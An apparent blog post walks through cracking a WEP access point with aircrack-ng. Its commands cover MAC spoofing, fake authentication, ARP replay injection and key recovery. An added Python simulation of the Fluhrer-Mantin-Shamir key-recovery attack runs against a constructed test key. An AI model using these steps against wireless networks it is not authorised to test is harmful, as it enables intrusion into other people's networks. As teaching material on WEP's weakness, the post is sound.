I had a bet with a friend of mine (for a case of beer) that I could crack a fake WEP encrypted access point in under 5 minutes using my rather old Packard Bell Easynote Skype Edition.
There are a few things to note, I used an old WEP only router that I was about to dump. I never saw the password and couldn’t ask for hints. I also found out that my piece of shit laptop can’t be booted from a DVD, hence having to use Backtrack 3 instead of Backtrack 5.
With Backtrack 3 downloaded, burnt to disc, booted up and a shell opened, the first snag appeared:
The drivers loaded automagically are the wrong ones. If you have the Easynote Skype Edition you'll notice this because the WiFi light on the WiFi button never comes on.
Unload the wireless drivers
modprobe -r iwl3945
Load the correct drivers
Take the wireless interface down (the MAC can't be changed while it's up)
airmon-ng stop wifi0
ifconfig wifi0 down
Change the MAC address. Any address will do, but the same one is passed to aireplay-ng's -h option below, so the AP treats the injected frames as coming from the station it authenticated.
macchanger --mac 00:11:22:33:44:55 wifi0
Bring the card back up in monitor mode with airmon-ng, then run airodump-ng against it to list the access points in range.
Once you've found the target and noted its BSSID and channel, lock airodump-ng onto that channel and write everything it captures to a file
airodump-ng -c CHANNEL_NUMBER -w FILE.OUT --bssid BSSID_HERE wifi0
Open up a new terminal, leaving airodump to run in Terminal 1.
Fake-authenticate with the AP from Terminal 2 (aireplay-ng attack 1; the 0 is the re-association delay, so this authenticates once). Without this the AP drops frames from a MAC it has never seen associate.
aireplay-ng -1 0 -b BSSID_HERE -h 00:11:22:33:44:55 wifi0
Airodump's #Data column should start climbing as it captures the AP's traffic; the replay in the next step needs a real ARP request from that traffic to work with. When #Data gets to about 100, kill the fake auth.
In Terminal 2, run the ARP request replay attack (aireplay-ng attack 3). It picks an ARP request out of the AP's traffic and re-injects it over and over; the AP answers every copy with a freshly encrypted frame, and each of those carries a new IV.
aireplay-ng -3 -b BSSID_HERE -h 00:11:22:33:44:55 wifi0
You should now see #Data shoot up. Let it run until #Data reaches about 50k (every data frame is one more IV for aircrack-ng to work with), then close Terminal 2 and kill airodump in Terminal 1.
Run aircrack-ng against the capture. Note that airodump-ng numbers its output files, so -w FILE.OUT produces FILE.OUT-01.cap rather than FILE.OUT.cap.
aircrack-ng -b BSSID_HERE FILE.OUT-01.cap
After about 15 seconds you should have the WEP key; aircrack-ng prints it as hex bytes (and as ASCII when it decodes as text). If it reports that it needs more IVs, leave the replay running a while longer and try again.
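Why does piling up IVs hand over the key? Every WEP data frame sends its 24-bit IV in the clear, RC4 is keyed with IV || key, and the first encrypted byte of a data frame is the fixed LLC/SNAP DSAP 0xAA, so each captured frame gives an attacker one (IV, first keystream byte) pair. The simulation below is an added example, not code from the original post or from aircrack-ng: it implements the original Fluhrer-Mantin-Shamir vote, which aircrack-ng has since replaced with the PTW attack that needs far fewer IVs, because FMS is the one that fits on a page. TEST_KEY, the probe frame and the "captured" traffic are all constructed here with a fixed seed, and the capture is salted with the FMS weak IVs (A+3, 0xFF, X) so the run stays short; a real capture has to be much larger before enough resolved IVs accumulate.

```python
"""FMS-style recovery of a WEP key from captured IVs, simulated offline.

Added example; not code from the original post or from aircrack-ng.  An
802.11 data frame sends its 24-bit IV in the clear and its first encrypted
byte is the LLC/SNAP DSAP 0xAA, so every captured frame hands the attacker
(IV, first keystream byte).  The Fluhrer-Mantin-Shamir attack turns enough
of those pairs into votes for each key byte.  TEST_KEY and all traffic are
constructed here.
"""
import random
import zlib

SNAP_DSAP = 0xAA                                   # known first plaintext byte of a data frame
TEST_KEY = bytes([0x1F, 0x2E, 0x3D, 0x4C, 0x5B])   # assumed 40-bit key, used only to build traffic


def rc4_keystream(key, nbytes):
    """Plain RC4: key scheduling, then nbytes of PRGA output."""
    S = list(range(256))
    j, klen = 0, len(key)
    for i in range(256):
        j = (j + S[i] + key[i % klen]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = [], 0, 0
    for _ in range(nbytes):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, plaintext):
    """WEP frame body: IV || (plaintext || CRC32 ICV) XOR RC4(IV || key)."""
    body = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    ks = rc4_keystream(iv + key, len(body))
    return iv + bytes(p ^ k for p, k in zip(body, ks))


def wep_check_key(key, frame):
    """True if `key` decrypts `frame` to data whose ICV verifies (how a cracker confirms a key)."""
    iv, ct = frame[:3], frame[3:]
    body = bytes(c ^ k for c, k in zip(ct, rc4_keystream(iv + key, len(ct))))
    return zlib.crc32(body[:-4]).to_bytes(4, "little") == body[-4:]


def capture(key, ivs):
    """Simulate sniffing: the attacker keeps (IV, first keystream byte) per frame."""
    return [(iv, wep_encrypt(key, iv, bytes([SNAP_DSAP]))[3] ^ SNAP_DSAP) for iv in ivs]


def fms_recover(samples, keylen):
    """Vote the key bytes in order, using only the (iv, z) samples.

    For key byte A, replay the first A+3 KSA steps with the known prefix
    IV || key[:A].  If the state is 'resolved' (S[1] + S[S[1]] == A+3) and
    later swaps leave those cells alone (probability about 5%), the first
    keystream byte z is exactly the value step A+3 swaps into S[A+3], i.e.
    S[j + S[A+3] + key[A]], so key[A] = S^-1[z] - j - S[A+3].  Samples that
    don't cooperate vote roughly uniformly, so the true byte wins in the end.
    """
    key = []
    for A in range(keylen):
        votes = [0] * 256
        for iv, z in samples:
            prefix = list(iv) + key
            S, j = list(range(256)), 0
            for i in range(A + 3):
                j = (j + S[i] + prefix[i]) & 0xFF
                S[i], S[j] = S[j], S[i]
            if (S[1] + S[S[1]]) & 0xFF != A + 3:
                continue                            # not a resolved state for this byte
            votes[(S.index(z) - j - S[A + 3]) & 0xFF] += 1
        key.append(max(range(256), key=votes.__getitem__))
    return bytes(key)


def crack(key_under_test, batch=12000, max_ivs=60000, seed=1):
    """Attacker loop: sniff a batch, vote, verify against a frame's ICV, repeat on failure.

    key_under_test only drives the simulated AP; the cracking side sees frames.
    Returns (recovered key or None, number of IVs used).
    """
    rng = random.Random(seed)
    n = len(key_under_test)
    # One complete frame (constructed) that a candidate key must decrypt with a valid ICV.
    probe = wep_encrypt(key_under_test, b"\x10\x20\x30", b"\xaa\xaa\x03" + b"\x00" * 5)
    # Assumption to keep the run short: salt the capture with the 256*n weak IVs
    # (A+3, 0xFF, X) from the FMS paper, which resolve for key byte A by
    # construction.  A real capture must be far larger for resolved IVs to pile up.
    samples = capture(key_under_test, [bytes([A + 3, 0xFF, x]) for A in range(n) for x in range(256)])
    while True:
        samples += capture(key_under_test, [rng.getrandbits(24).to_bytes(3, "big") for _ in range(batch)])
        guess = fms_recover(samples, n)
        if wep_check_key(guess, probe):
            return guess, len(samples)
        if len(samples) >= max_ivs:
            return None, len(samples)


if __name__ == "__main__":
    key, used = crack(TEST_KEY)
    print("recovered", key.hex() if key else None, "from", used, "IVs")
```

The retry loop mirrors what aircrack-ng does when left running next to airodump-ng: vote on what has been captured, confirm the candidate by checking a frame's ICV, and go back for more IVs if the check fails. Nothing on the cracking side ever reads TEST_KEY; it only sees IVs, first ciphertext bytes and one whole frame.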